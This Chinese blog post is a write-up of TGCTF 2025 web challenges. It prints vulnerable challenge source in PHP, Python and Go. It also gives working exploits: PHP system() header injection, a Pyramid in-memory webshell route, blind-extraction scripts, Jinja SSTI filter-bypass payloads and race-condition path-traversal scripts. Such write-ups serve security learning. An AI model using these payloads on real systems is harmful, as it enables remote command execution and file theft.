Featured image of post 2025TGCTF复现

2025TGCTF复现

2025TGCTF复现

AAA偷渡阴平(复仇)

预期

session没禁用

image-20250415000000376

非预期

1
/?tgctf2025=system(implode(apache_request_headers()));
1
/?tgctf2025=system(hex2bin(lcfirst(key(apache_request_headers()))));

熟悉的配方,熟悉的味道

源码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
from pyramid.config import Configurator
from pyramid.request import Request
from pyramid.response import Response
from pyramid.view import view_config
from wsgiref.simple_server import make_server
from pyramid.events import NewResponse
import re
from jinja2 import Environment, BaseLoader

eval_globals = { # globals dict handed to eval() to keep it from running malicious code
    '__builtins__': {},      # disable all built-in functions
    '__import__': None       # forbid dynamic imports
}


def checkExpr(expr_input):
    """Return 1 when expr_input splits on - + * / into exactly two parts that int() accepts, else 0.

    NOTE(review): the raw input is passed to exec() *before* any of the checks
    below, and without the restricted eval_globals. Arbitrary statements
    therefore run (and any exception they raise propagates to the caller)
    regardless of the value this function would have returned.
    """
    expr = re.split(r"[-+*/]", expr_input)
    # exec() returns None, so this prints "None" after executing the input.
    print(exec(expr_input))

    # Anything other than "<part><operator><part>" is rejected.
    if len(expr) != 2:
        return 0
    try:
        int(expr[0])
        int(expr[1])
    except:
        # Bare except: any failure converting either part counts as a rejection.
        return 0

    return 1


def home_view(request):
    """Handle the "/" route: evaluate a POSTed expression and render the page.

    On POST, reads request.POST['expr']. When checkExpr() accepts it, the
    expression is evaluated with eval() under eval_globals and the value (or
    the caught exception object) becomes the result; otherwise the result is
    the fixed rejection string. The page is rendered with Jinja2 and returned
    as a pyramid Response.
    """
    expr_input = ""
    result = ""

    if request.method == 'POST':
        expr_input = request.POST['expr']
        if checkExpr(expr_input):
            try:
                result = eval(expr_input, eval_globals)
            except Exception as e:
                # The exception object itself is shown to the user.
                result = e
        else:
            result = "爬!"


    # NOTE(review): `xxx` is not defined anywhere in this listing — presumably
    # the real template text was elided when the source was published.
    template_str = xxx

    env = Environment(loader=BaseLoader())
    template = env.from_string(template_str)
    rendered = template.render(expr_input=expr_input, result=result)
    return Response(rendered)


# Script entry point: register home_view on "/" and serve it with wsgiref.
# `config` and `app` are module-level names, so code exec()'d inside
# checkExpr can reach them through the module globals.
if __name__ == '__main__':
    with Configurator() as config:
        config.add_route('home_view', '/')
        config.add_view(home_view, route_name='home_view')
        app = config.make_wsgi_app()

    # Listen on every interface, port 9040.
    server = make_server('0.0.0.0', 9040, app)
    server.serve_forever()

eval设了很严格的限制,但是checkExpr在做任何校验之前就直接对输入调用了exec,而exec没有任何限制

用exec打内存马

1
2
3
expr=exec("config.add_route('shell_route','/shell');config.add_view(lambda request:Response(__import__('os').popen(request.params.get('a')).read()),route_name='shell_route');app = config.make_wsgi_app()")

或者用request.add_response_callback 钩子函数进行回显。(是个好方法,但是这里用不了,因为exec不在home_view下没有request)

1
2
3
print(exec("request.add_response_callback(lambda request, response:setattr(response, 'text', getattr(getattr(__import__('os'),'popen')('whoami'),'read')()))"));

其他办法

利用抛出错误,用污染HTTP 500的返回消息实现回显,这里用wsgi打

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
# Echo command output through the server's HTTP 500 page: the injected code
# overwrites wsgiref.handlers.BaseHandler.error_body with the command output
# and then raises, so the error response carries that output.
import requests

url = "http://127.0.0.1:59183/"

# Statements executed on the server. Builtins are fetched from the re module's
# globals, as the payload itself shows.
code = """
b = re.match.__globals__['__builtins__']
b["setattr"](b['__import__']('wsgiref').handlers.BaseHandler,"error_body",b["__import__"]('os').popen('cat /flagggggg_tgctf2025_asjdklalkcnkjassjhdlk').read().encode())
raise Exception("1")
"""

# Wrap the statements in a single exec(...) call expression.
form = {"expr": "exec(" + repr(code) + ")"}
resp = requests.post(url, data=form)

print(resp.status_code)
print(resp.text)

同样的原理可以劫持404界面(下面的脚本通过注册新路由 /cmd 把命令输出回显出来)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
# Register an extra "/cmd" route on the running Pyramid app whose view returns
# the output of a shell command, then request that route to read the output.
import requests

url = 'http://127.0.0.1:59183/'

payload = "cat /flagggggg_tgctf2025_asjdklalkcnkjassjhdlk"

# Statements executed on the server; `config` and `Response` are looked up in
# the application module's globals.
exp = f'''
def shell(request):
    import os
    res = os.popen("{payload}").read()
    return Response(res)
config.add_route('cmd', '/cmd')
config.add_view(shell, route_name='cmd')
config.commit()
'''

data = {"expr": exp}
res = requests.post(url, data=data)
# `url` already ends with "/", so strip it first: url + '/cmd' would request
# "//cmd", which is not the "/cmd" pattern registered above.
p = requests.get(url.rstrip('/') + '/cmd')
print(p.text)

时间盲注

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# Time-based blind extraction: for each position, ask the server to sleep for
# two seconds when the flag character at that position equals the candidate,
# and treat a slow response as a hit.
import string
import time
import os
import requests
url = "http://node1.tgctf.woooo.tech:31931/"
ans = ""
for i in range(0, 100):
    for strr in string.printable:
        # Statements executed on the server for this (position, candidate) pair.
        shell = f"""
import os
import time
a = os.popen('cat /fl*').read()
if len(a) > {i} and a[{i}] == '{strr}':
    time.sleep(2)
"""
        start = time.time()

        requests.post(url, data={'expr': shell})

        end = time.time()
        if end - start > 2:
            ans += strr
            print(ans)
            # The character at this position is known: skip the remaining
            # candidates so a later slow response cannot append a second,
            # spurious character for the same position.
            break

布尔盲注

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
# Boolean blind extraction: the injected statements end with 1/a, where a is 1
# when the flag character at position i equals the candidate and 0 otherwise.
# A mismatch therefore raises ZeroDivisionError and yields the server's error
# page; any other response body is treated as a match.
import string
import requests
from tqdm import tqdm
url = "http://node1.tgctf.woooo.tech:30215"
flag = "TGCTF{028b2d11-2783-464c-8cea-fda040"

for i in range(len(flag),50):
    for s in tqdm('-'+'}'+'{'+string.ascii_lowercase+string.digits):
        data = {"expr":f"import os,operator;f=os.popen('cat /f*').read();a=int(operator.eq(f[{i}],'{s}'));1/a"}
        res = requests.post(url, data=data)
        if res.text != "A server error occurred.  Please contact the administrator.":
            flag += s
            print(flag)
            break
    else:
        # No candidate matched. Carrying on would append later characters at
        # the wrong offset, so stop instead of producing a misaligned flag.
        print(f"no candidate matched position {i}; stopping")
        break
    print(i)
    if s == '}':
        # The closing brace ends the flag; nothing more to extract.
        break

直面天命(复仇)

fenjing一把梭(

源码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
import os
import string
from flask import Flask, request, render_template_string, jsonify, send_from_directory
from a.b.c.d.secret import secret_key

app = Flask(__name__)

# Substrings rejected by waf(); matching is done against the lower-cased input.
black_list=['lipsum','|','%','{','}','map','chr', 'value', 'get', "url", 'pop','include','popen','os','import','eval','_','system','read','base','globals','_.','set','application','getitem','request', '+', 'init', 'arg', 'config', 'app', 'self']
def waf(name):
    """Return True when any black_list entry occurs in name.lower(), otherwise False."""
    for x in black_list:
        if x in name.lower():
            return True
    return False
def is_typable(char):
    """Return True when char occurs in ASCII letters + digits + punctuation + whitespace."""
    # Character set that can be entered on a standard QWERTY keyboard.
    typable_chars = string.ascii_letters + string.digits + string.punctuation + string.whitespace
    return char in typable_chars

# Index page: serves index.html from the "static" directory.
@app.route('/')
def home():
    return send_from_directory('static', 'index.html')

# POST /jingu: builds a template from the "name" form field and renders it.
# NOTE(review): the multi-line string literals below lost their HTML markup
# when this listing was extracted, so the block is not valid Python as shown.
@app.route('/jingu', methods=['POST'])
def greet():
    template1=""
    template2=""
    name = request.form.get('name')
    # The raw user input becomes the template text.
    template = f'{name}'
    # Blacklisted input is replaced by a fixed rejection message.
    if waf(name):
        template = '想干坏事了是吧hacker?哼,还天命人,可笑,可悲,可叹
Image'
    else:
        # k becomes 1 as soon as one character outside is_typable()'s set is seen.
        k=0
        for i in name:
            if is_typable(i):
                continue
            k=1
            break
        if k==1:
            # NOTE(review): only secret_key[:2] is tested for membership in name;
            # secret_key[2:] is merely checked for truthiness.
            if not (secret_key[:2] in name and secret_key[2:]):
                template = '连“六根”都凑不齐,谈什么天命不天命的,还是戴上这金箍吧

再去西行历练历练

Image'
                return render_template_string(template)
            template1 = "“六根”也凑齐了,你已经可以直面天命了!我帮你把“secret_key”替换为了“{{}}”
最后如果你用了cat就可以见到齐天大圣了
"
            # The two marker words are turned into Jinja expression delimiters.
            template= template.replace("天命","{{").replace("难违","}}")
            template = template
    if "cat" in template:
        template2 = '
或许你这只叫天命人的猴子真的能做到

Image'
    try:
        # `template` is rendered as a Jinja template.
        return template1+render_template_string(template)+render_template_string(template2)
    except Exception as e:
        # Rendering failures are reported with status 400 together with the template text.
        error_message = f"500报错了,查询语句如下:
{template}"
        return error_message, 400

# GET /hint: renders a fixed hint that points at the /aazz route.
# NOTE(review): the string literal below lost its markup during extraction.
@app.route('/hint', methods=['GET'])
def hinter():
    template="hint:
有一个aazz路由去那里看看吧天命人!"
    return render_template_string(template)

# GET /aazz: returns this application's own source file as text/html.
# NOTE(review): the f-string below lost its surrounding markup during extraction.
@app.route('/aazz', methods=['GET'])
def finder():
    with open(__file__, 'r') as f:
        source_code = f.read()
    return f"

{source_code}

", 200, {'Content-Type': 'text/html; charset=utf-8'}

# Script entry point: serve the Flask app on every interface, port 80.
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)

secret_key可以去原版本读到

1
secret_key = "直面天命"

fenjing操作

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
from fenjing import exec_cmd_payload, config_payload

def waf(s: str):
    """Return True when s contains none of the blacklisted substrings.

    This is the local filter given to fenjing, which uses it to decide
    whether a candidate payload is usable. The challenge's own check matches
    against the lower-cased input, so the comparison here is also done on
    s.lower(); otherwise a payload containing e.g. "OS" would be accepted
    locally but rejected by the server.
    """
    blacklist = ['lipsum','|','%','map','chr', 'value', 'get', "url", 'pop','include','popen','os','import','eval','_','system','read','base','globals','_.','set','application','getitem','request', '+', 'init', 'arg', 'config', 'app', 'self']
    lowered = s.lower()
    return all(word not in lowered for word in blacklist)

if __name__ == "__main__":
    # Let fenjing build a command-execution payload that passes waf(); the
    # second element of the returned pair is not needed here.
    generated = exec_cmd_payload(waf, "cat /tgffff11111aaaagggggggg")
    shell_payload = generated[0]
    # Swap the Jinja delimiters for the two marker words the challenge
    # converts back into "{{" and "}}".
    for delimiter, marker in (("{{", "天命"), ("}}", "难违")):
        shell_payload = shell_payload.replace(delimiter, marker)
    print(shell_payload)

或者unicode绕

1
直面天命g['\u0070\u006f\u0070']['\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f']['\u005f\u005f\u0062\u0075\u0069\u006c\u0074\u0069\u006e\u0073\u005f\u005f']['\u005f\u005f\u0069\u006d\u0070\u006f\u0072\u0074\u005f\u005f']('so'[::-1])['\u0070\u006f\u0070\u0065\u006e']('cat /*')['\u0072\u0065\u0061\u0064']()难违

官方payload

1
2
3
直面[]["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()[351]('cat flag',shell=True,stdout=-1).communicate()[0].strip()天命

老登,炸鱼来了?

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
package main

import (
	"fmt"
	"io"
	"log"
	"net/http"
	"os"
	"path/filepath"
	"strings"
	"text/template"
	"time"
)

// Note is the per-file record the index handler builds for each regular file
// in the notes directory.
type Note struct {
	// Name is the file name reported by the directory entry.
	Name       string
	// ModTime is the modification time formatted as "2006-01-02 15:04".
	ModTime    string
	// Size is the size reported by the entry's FileInfo.
	Size       int64
	// IsMarkdown is true when Name ends in ".md".
	IsMarkdown bool
}

// templates holds everything parsed from templates/*; template.Must panics at
// start-up if parsing fails. The package in use is text/template.
var templates = template.Must(template.ParseGlob("templates/*"))

// PageData is the value passed to index.html.
type PageData struct {
	// Notes is the list of files to show.
	Notes []Note
	// Error is not set anywhere in this listing.
	Error string
}

// blackJack is the path filter: it returns an error when path contains "..",
// "/" or "flag", and nil otherwise.
func blackJack(path string) error {

	if strings.Contains(path, "..") || strings.Contains(path, "/") || strings.Contains(path, "flag") {
		return fmt.Errorf("非法路径")
	}

	return nil
}

// renderTemplate executes the named template with data into w and, if
// execution fails, reports the error text with status 500.
func renderTemplate(w http.ResponseWriter, tmpl string, data interface{}) {
	safe := templates.ExecuteTemplate(w, tmpl, data)
	if safe != nil {
		http.Error(w, safe.Error(), http.StatusInternalServerError)
	}
}

// renderError writes the status code and then renders error.html with the
// code and message. The error returned by ExecuteTemplate is ignored.
func renderError(w http.ResponseWriter, message string, code int) {
	w.WriteHeader(code)
	templates.ExecuteTemplate(w, "error.html", map[string]interface{}{
		"Code":    code,
		"Message": message,
	})
}

// main creates the notes directory, registers the index, /read, /write,
// /delete and /static/ handlers on the default mux, and serves on :9046.
func main() {
	os.Mkdir("notes", 0755)

	// NOTE(review): this declares a single `safe` in main's scope. The /read,
	// /write and /delete closures below assign to it with `=`, so every
	// request writes to and checks this one shared variable.
	safe := blackJack("/flag") // bad example: this call returns the "非法路径" error

	// Index: list the regular files in notes/.
	http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		// `:=` here declares a handler-local safe, separate from main's.
		files, safe := os.ReadDir("notes")
		if safe != nil {
			renderError(w, "无法读取目录", http.StatusInternalServerError)
			return
		}

		var notes []Note
		for _, f := range files {
			if f.IsDir() {
				continue
			}

			// The error from f.Info() is discarded.
			info, _ := f.Info()
			notes = append(notes, Note{
				Name:       f.Name(),
				ModTime:    info.ModTime().Format("2006-01-02 15:04"),
				Size:       info.Size(),
				IsMarkdown: strings.HasSuffix(f.Name(), ".md"),
			})
		}

		renderTemplate(w, "index.html", PageData{Notes: notes})
	})

	// Read: return up to 10240 bytes of notes/<name>.
	http.HandleFunc("/read", func(w http.ResponseWriter, r *http.Request) {
		name := r.URL.Query().Get("name")

		// Plain `=`: assigns to main's shared safe and then tests it. Another
		// request can overwrite the variable between the assignment and the test.
		if safe = blackJack(name); safe != nil {
			renderError(w, safe.Error(), http.StatusBadRequest)
			return
		}

		// From here on `safe` is a new handler-local variable declared by `:=`.
		// NOTE(review): file is never closed in this handler.
		file, safe := os.Open(filepath.Join("notes", name))
		if safe != nil {
			renderError(w, "文件不存在", http.StatusNotFound)
			return
		}

		data, safe := io.ReadAll(io.LimitReader(file, 10240))
		if safe != nil {
			renderError(w, "读取失败", http.StatusInternalServerError)
			return
		}

		// ".md" files are embedded unmodified into an HTML page; everything
		// else is sent as text/plain.
		if strings.HasSuffix(name, ".md") {
			w.Header().Set("Content-Type", "text/html")
			fmt.Fprintf(w, `<html><head><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/github-markdown-css/5.1.0/github-markdown.min.css"></head><body class="markdown-body">%s</body></html>`, data)
		} else {
			w.Header().Set("Content-Type", "text/plain")
			w.Write(data)
		}
	})

	// Write: store the posted content as notes/<name> plus an extension.
	http.HandleFunc("/write", func(w http.ResponseWriter, r *http.Request) {
		// Non-POST requests return here, before the path check runs.
		if r.Method != "POST" {
			renderError(w, "方法不允许", http.StatusMethodNotAllowed)
			return
		}

		name := r.FormValue("name")
		content := r.FormValue("content")

		// Same shared-variable pattern as in /read.
		if safe = blackJack(name); safe != nil {
			renderError(w, safe.Error(), http.StatusBadRequest)
			return
		}

		// NOTE(review): a markdown request whose name already ends in ".md"
		// falls into the else branch and gets ".txt" appended.
		if r.FormValue("format") == "markdown" && !strings.HasSuffix(name, ".md") {
			name += ".md"
		} else {
			name += ".txt"
		}

		// Content is truncated to 10240 bytes.
		if len(content) > 10240 {
			content = content[:10240]
		}

		safe := os.WriteFile(filepath.Join("notes", name), []byte(content), 0600)
		if safe != nil {
			renderError(w, "保存失败", http.StatusInternalServerError)
			return
		}

		http.Redirect(w, r, "/", http.StatusSeeOther)
	})

	// Delete: remove notes/<name>.
	http.HandleFunc("/delete", func(w http.ResponseWriter, r *http.Request) {
		name := r.URL.Query().Get("name")
		// Same shared-variable pattern as in /read.
		if safe = blackJack(name); safe != nil {
			renderError(w, safe.Error(), http.StatusBadRequest)
			return
		}

		safe := os.Remove(filepath.Join("notes", name))
		if safe != nil {
			renderError(w, "删除失败", http.StatusInternalServerError)
			return
		}

		http.Redirect(w, r, "/", http.StatusSeeOther)
	})

	// Static file service.
	http.Handle("/static/", http.StripPrefix("/static/", http.FileServer(http.Dir("static"))))

	// No Handler is set on the server, so the default mux populated above is used.
	srv := &http.Server{
		Addr:         ":9046",
		ReadTimeout:  10 * time.Second,
		WriteTimeout: 15 * time.Second,
	}
	log.Fatal(srv.ListenAndServe())
}

漏洞点在这

1
2
3
4
if safe = blackJack(name); safe != nil {
			renderError(w, safe.Error(), http.StatusBadRequest)
			return
		}

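在Go中,运算符 := 用于声明并赋值一个新变量,而 = 只能给已经存在的变量赋值。这里的 safe 是在 main 里用 := 声明的,各个 handler 中写的是 safe = blackJack(name),赋值的是同一个外层变量,因此所有并发请求共享这一个 safe。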

先用一个合法的 name 发请求,使共享的 safe 被赋值为 nil,同时并发地请求读取 flag;只要合法请求的赋值恰好落在非法请求的赋值与 safe != nil 的判断之间,此时 safe 还会是 nil,检查就被绕过。

官方exp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
import aiohttp
import asyncio
import time
class Solver:
    """Race-condition driver for the note service's /read endpoint.

    Each round fires RACE_CONDITION_JOBS pairs of concurrent requests: one
    with a name that passes the server's path check and one with a traversal
    path that does not. The rounds repeat until a response contains the flag
    prefix.
    """

    def __init__(self, baseUrl):
        """Store the target base URL and the two request suffixes."""
        self.baseUrl = baseUrl
        # Both suffixes start with "/", so drop a trailing "/" from the base
        # to avoid requesting "//read".
        self.READ_FILE_ENDPOINT = self.baseUrl.rstrip('/')
        self.VALID_CHECK_PARAMETER = '/read?name=1'
        self.INVALID_CHECK_PARAMETER = '/read?name=../../../flag'
        self.RACE_CONDITION_JOBS = 100

    async def raceValidationCheck(self, session, parameter):
        """GET READ_FILE_ENDPOINT + parameter and return the response body text."""
        url = f'{self.READ_FILE_ENDPOINT}{parameter}'
        async with session.get(url) as response:
            return await response.text()

    async def raceCondition(self, session):
        """Run one round and return all response bodies, in request order."""
        tasks = list()
        for _ in range(self.RACE_CONDITION_JOBS):
            tasks.append(self.raceValidationCheck(session,self.VALID_CHECK_PARAMETER))
            tasks.append(self.raceValidationCheck(session,self.INVALID_CHECK_PARAMETER))
        # Gather only after every pair is queued; returning from inside the
        # loop would send a single pair per round.
        return await asyncio.gather(*tasks)

    async def solve(self):
        """Repeat rounds until a response contains the flag, then print it and exit."""
        async with aiohttp.ClientSession() as session:
            attempts = 1
            finishedRaceConditionJobs = 0
            while True:
                print(f'[*] Attempts < #{attempts} - Finished race conditionjobs: {finishedRaceConditionJobs}')
                results = await self.raceCondition(session)
                attempts += 1
                finishedRaceConditionJobs += self.RACE_CONDITION_JOBS
                for result in results:
                    if 'TGCTF{' not in result:
                        continue

                    # Reached only for a body containing the flag prefix.
                    print(f'\n[+] We won the race window! Flag:{result.strip()}')
                    exit(0)
# Script entry point: run the solver against a local challenge instance.
if __name__== '__main__':
    baseUrl = 'http://127.0.0.1:63028/'
    solver = Solver(baseUrl)
    asyncio.run(solver.solve())

拉蒙特徐的exp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
import aiohttp
import asyncio
import time

class Solver:
    """Race-condition driver that pairs a /write request with a traversal /read.

    NOTE(review): the requests are sent with GET. The note service listed in
    this write-up rejects non-POST /write requests before its path check runs,
    so the "valid" half may never reset the shared error — confirm against the
    deployed challenge.
    """

    def __init__(self, baseUrl):
        """Remember the target and the two request suffixes."""
        self.baseUrl = baseUrl
        self.READ_FILE_ENDPOINT = f'{self.baseUrl}'
        self.VALID_CHECK_PARAMETER = '/write?name=123.md&content=flag&format=markdown'
        self.INVALID_CHECK_PARAMETER = '/read?name=../../../../../flag'
        self.RACE_CONDITION_JOBS = 100

    async def setSessionCookie(self, session):
        """Issue one GET to the base URL."""
        await session.get(self.baseUrl)

    async def raceValidationCheck(self, session, parameter):
        """GET READ_FILE_ENDPOINT + parameter and return the body text."""
        target = f'{self.READ_FILE_ENDPOINT}{parameter}'
        async with session.get(target) as reply:
            body = await reply.text()
        return body

    async def raceCondition(self, session):
        """Fire RACE_CONDITION_JOBS valid/invalid pairs at once; return all bodies in order."""
        pair = (self.VALID_CHECK_PARAMETER, self.INVALID_CHECK_PARAMETER)
        pending = [
            self.raceValidationCheck(session, suffix)
            for _ in range(self.RACE_CONDITION_JOBS)
            for suffix in pair
        ]
        return await asyncio.gather(*pending)

    async def solve(self):
        """Repeat rounds until a body contains the flag prefix, then print it and exit."""
        async with aiohttp.ClientSession() as session:
            await asyncio.sleep(1) # wait for the reverse proxy creation

            attempt_no = 1
            jobs_done = 0
            while True:
                print(f'[*] Attempts #{attempt_no} - Finished race condition jobs: {jobs_done}', end='\r')

                bodies = await self.raceCondition(session)
                attempt_no += 1
                jobs_done += self.RACE_CONDITION_JOBS
                for body in bodies:
                    # Every body is echoed, whether or not it holds the flag.
                    print(body)
                    if 'TGCTF{' in body:
                        print(f'\n[+] We won the race window! Flag: {body.strip()}')
                        exit(0)

# Script entry point. The guard must test __name__; the bare `name` in the
# original is undefined and raises NameError as soon as the file is loaded.
if __name__ == '__main__':
    baseUrl = 'http://node1.tgctf.woooo.tech:30308' # for local testing
    # baseUrl = 'http://49.13.169.154:8088'
    solver = Solver(baseUrl)

    asyncio.run(solver.solve())
Licensed under 9u_l3
使用 Hugo 构建
主题 StackJimmy 设计